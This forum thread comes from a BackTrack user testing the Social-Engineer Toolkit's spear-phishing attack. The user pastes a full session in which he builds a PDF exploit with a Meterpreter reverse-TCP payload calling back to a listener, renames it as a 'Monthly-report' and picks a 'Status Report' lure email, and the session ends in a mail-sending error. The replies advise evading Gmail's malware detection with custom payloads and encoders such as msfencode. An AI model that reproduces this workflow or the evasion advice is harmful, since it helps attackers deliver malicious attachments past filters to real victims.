Results 1 to 5 of 5

Thread: SET & Spear Phishing PDF caught

  1. #1
    Just burned his ISO
    Join Date
    Oct 2011
    Posts
    13

    Default SET & Spear Phishing PDF caught

    I am running BT 5 x 32 bit Gnome in Virtual Box and I am testing the Spear phishing attack vector in SET.
    I have 2 questions.
    1st I have followed the tutorial found at Dave Kennedy's site (http://www.secmaniac.com/) and I am receiving the following error : [!] Unable to deliver email. Printing exceptions message below, this is most likely due to an illegal attachment. If using GMAIL they inspect PDFs and is most likely getting caught.
    So I have change the provider to Hotmail and I have got the error in the second point. Anyone else encounter the same issue ?

    2nd I had another error and below the steps I did :

    Code:
    set> 1
    
     The Spearphishing module allows you to specially craft email messages and send
     them to a large (or small) number of people with attached fileformat malicious
     payloads. If you want to spoof your email address, be sure "Sendmail" is in-
     stalled (it is installed in BT4) and change the config/set_config SENDMAIL=OFF
     flag to SENDMAIL=ON.
    
     There are two options, one is getting your feet wet and letting SET do
     everything for you (option 1), the second is to create your own FileFormat
     payload and use it in your own attack. Either way, good luck and enjoy!
    
       1) Perform a Mass Email Attack
       2) Create a FileFormat Payload
       3) Create a Social-Engineering Template
    
      99) Return to Main Menu
    
    set:phishing>1
    
     Select the file format exploit you want.
     The default is the PDF embedded EXE.
    
               ********** PAYLOADS **********
    
       1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
       2) SET Custom Written Document UNC LM SMB Capture Attack
       3) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
       4) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
       5) Adobe Flash Player "Button" Remote Code Execution
       6) Adobe CoolType SING Table "uniqueName" Overflow
       7) Adobe Flash Player "newfunction" Invalid Pointer Use
       8) Adobe Collab.collectEmailInfo Buffer Overflow
       9) Adobe Collab.getIcon Buffer Overflow
      10) Adobe JBIG2Decode Memory Corruption Exploit
      11) Adobe PDF Embedded EXE Social Engineering
      12) Adobe util.printf() Buffer Overflow
      13) Custom EXE to VBA (sent via RAR) (RAR required)
      14) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
      15) Adobe PDF Embedded EXE Social Engineering (NOJS)
      16) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
      17) Apple QuickTime PICT PnSize Buffer Overflow
      18) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
    
    set:payloads>12
    
    
    
       1) Windows Reverse TCP Shell              Spawn a command shell on victim and send back to attacker
       2) Windows Meterpreter Reverse_TCP        Spawn a meterpreter shell on victim and send back to attacker
       3) Windows Reverse VNC DLL                Spawn a VNC server on victim and send back to attacker
       4) Windows Reverse TCP Shell (x64)        Windows X64 Command Shell, Reverse TCP Inline
       5) Windows Meterpreter Reverse_TCP (X64)  Connect back to the attacker (Windows x64), Meterpreter
       6) Windows Shell Bind_TCP (X64)           Execute payload and create an accepting port on remote system
       7) Windows Meterpreter Reverse HTTPS      Tunnel communication over HTTP using SSL and use Meterpreter
    
    set:payloads>2
    set> IP address for the payload listener: 192.168.10.3
    set:payloads> Port to connect back on [443]:443
    [-] Generating fileformat exploit...[*] Payload creation complete.[*] All payloads get sent to the /pentest/exploits/set/src/program_junk/template.pdf directory
    [-] As an added bonus, use the file-format creator in SET to create your attachment.
    
       Right now the attachment will be imported with filename of 'template.whatever'
    
       Do you want to rename the file?
    
       example Enter the new filename: moo.pdf
    
        1. Keep the filename, I don't care.
        2. Rename the file, I want to be cool.
    
    set:phishing>2
    set:phishing> New filename:Monthly-report [*] Filename changed, moving on...
    
       Social Engineer Toolkit Mass E-Mailer
    
       There are two options on the mass e-mailer, the first would
       be to send an email to one individual person. The second option
       will allow you to import a list and send it to as many people as
       you want within that list.
    
       What do you want to do:
    
       1.  E-Mail Attack Single Email Address
       2.  E-Mail Attack Mass Mailer
    
       99. Return to main menu.
       
    set:phishing>1
    
       Do you want to use a predefined template or craft
       a one time email template. 
    
       1. Pre-Defined Template
       2. One-Time Use Email Template
    
    set:phishing>1
    [-] Available templates:
    1: Have you seen this?
    2: Strange internet usage from your computer
    3: WOAAAA!!!!!!!!!! This is crazy...
    4: Dan Brown's Angels & Demons
    5: How long has it been?
    6: New Update
    7: Computer Issue
    8: Baby Pics
    9: Status Report
    set:phishing>9
    set:phishing> Send email to:testdeset1@gmail.com
    
      1. Use a hotmail Account for your email attack.
      2. Use your own server or open relay
    
    set:phishing>1
    set:phishing> Your hotmail email address: :testdeset2@hotmail.com
    Email password: 
    set:phishing> Flag this message/s as high priority? [yes|no]:y
    Traceback (most recent call last):
      File "./set", line 103, in <module>
        import src.core.set
      File "/pentest/exploits/set/src/core/set.py", line 82, in <module>
        import create_payload
      File "src/core/msf_attacks/create_payload.py", line 188, in <module>
        except: import smtp_client
      File "src/phishing/smtp/client/smtp_client.py", line 376, in <module>
        mail("%s" % (to), subject, body, "%s" % (file_format), prioflag1, prioflag2)
      File "src/phishing/smtp/client/smtp_client.py", line 332, in mail
        mailServer = smtplib.SMTP(smtp, int(port))
      File "/usr/lib/python2.6/smtplib.py", line 239, in __init__
        (code, msg) = self.connect(host, port)
      File "/usr/lib/python2.6/smtplib.py", line 295, in connect
        self.sock = self._get_socket(host, port, self.timeout)
      File "/usr/lib/python2.6/smtplib.py", line 273, in _get_socket
        return socket.create_connection((port, host), timeout)
      File "/usr/lib/python2.6/socket.py", line 500, in create_connection
        for res in getaddrinfo(host, port, 0, SOCK_STREAM):
    socket.gaierror: [Errno -2] Name or service not known
    root@bt:/pentest/exploits/set#
    I do not know the python language, I have checked those file and I cannot understand anything. I have looked in the forum, google it and nothing.
    Any ideas what going on?? Thank you

  2. #2
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Default Re: SET & Spear Phishing PDF caught

    If you read the error message ... you can actually see it tells you that most probably GMAIL had detected your payload inside the PDF, case in which it will not let you send it.
    Back|track giving machine guns to monkeys since 2007 !

    Do not read the Wiki, most your questions will not be answered there !
    Do not take a look at the: Forum Rules !

  3. #3
    Just burned his ISO
    Join Date
    Oct 2011
    Posts
    13

    Default Re: SET & Spear Phishing PDF caught

    I understand the warning. So any Ideas how to evade this ? because when I watched a couple of vids it appears that it working. Anybody else is facing the same issue?

  4. #4
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Default Re: SET & Spear Phishing PDF caught

    Metasploit payloads are getting detected often, so best way is to create your own payload + your own encoder.
    Back|track giving machine guns to monkeys since 2007 !

    Do not read the Wiki, most your questions will not be answered there !
    Do not take a look at the: Forum Rules !

  5. #5
    Just burned his ISO
    Join Date
    Apr 2012
    Posts
    6

    Default Re: SET & Spear Phishing PDF caught

    msfencode is your new friend.

Similar Threads

  1. Caught signal 11, Live usb KDE
    By laser411 in forum BackTrack 5 Bugs
    Replies: 3
    Last Post: 06-20-2011, 02:01 PM
  2. Replies: 5
    Last Post: 12-22-2010, 09:08 AM
  3. Three questions about spear phishing and the java attacks.
    By manofmoment in forum Experts Forum
    Replies: 1
    Last Post: 08-03-2010, 06:01 PM
  4. Caught hacking, doing time in prison -- post your stories
    By IAMZOMBIE in forum OLD Newbie Area
    Replies: 9
    Last Post: 10-06-2009, 01:24 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •